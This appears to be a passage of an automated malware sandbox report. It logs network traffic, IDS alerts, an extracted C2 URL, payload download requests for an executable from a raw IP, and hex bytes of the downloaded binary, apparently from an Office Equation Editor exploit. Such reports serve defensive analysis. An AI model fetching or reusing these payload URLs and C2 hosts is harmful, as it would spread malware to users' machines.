                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 107.175.243.142:80 -> 192.168.2.22:49163
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://maan2u.com/doc/233_Qzzgbhhaaml
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 25 Sep 2024 07:43:26 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 25 Sep 2024 00:08:41 GMTETag: "109c00-622e66ca7c781"Accept-Ranges: bytesContent-Length: 1088512Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 32 06 00 00 66 0a 00 00 00 00 00 24 48 06 00 00 10 00 00 00 50 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 11 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 0f 00 86 28 00 00 00 70 10 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 50 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0f 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 b7 0f 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 27 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 6c 08 00 00 00 40 06 00 00 0a 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d8 12 09 00 00 50 06 00 00 14 09 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 f8 36 00 00 00 70 0f 00 00 00 00 00 00 4a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 86 28 00 00 00 b0 0f 00 00 2a 00 00 00 4a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 e0 0f 00 00 00 00 00 00 74 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 0f 00 00 02 00 00 00 74 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 6c 00 00 00 00 10 00 00 6e 00 00 00 76 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 b8 00 00 00 70 10 00 00 b8 00 00 00 e4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 30 11 00 00 00 00 00 00 9c 10 00 00 00
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewASN Name: TMVADS-APTM-VADSDCHostingMY TMVADS-APTM-VADSDCHostingMY
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: global trafficHTTP traffic detected: GET /doc/233_Qzzgbhhaaml HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: maan2u.com
                  Source: global trafficHTTP traffic detected: GET /340/audiodg.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.243.142Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 112.137.173.77:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{92722C27-8B95-4B62-9DF9-92A5A0127A04}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /doc/233_Qzzgbhhaaml HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: maan2u.com
                  Source: global trafficHTTP traffic detected: GET /340/audiodg.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.243.142Connection: Keep-Alive
                  Source: audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: maan2u.com
                  Source: EQNEDT32.EXE, 00000002.00000002.380237258.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.243.142/340/audiodg.exe
                  Source: EQNEDT32.EXE, 00000002.00000002.380237258.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.243.142/340/audiodg.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.380237258.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.243.142/340/audiodg.exellC:
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
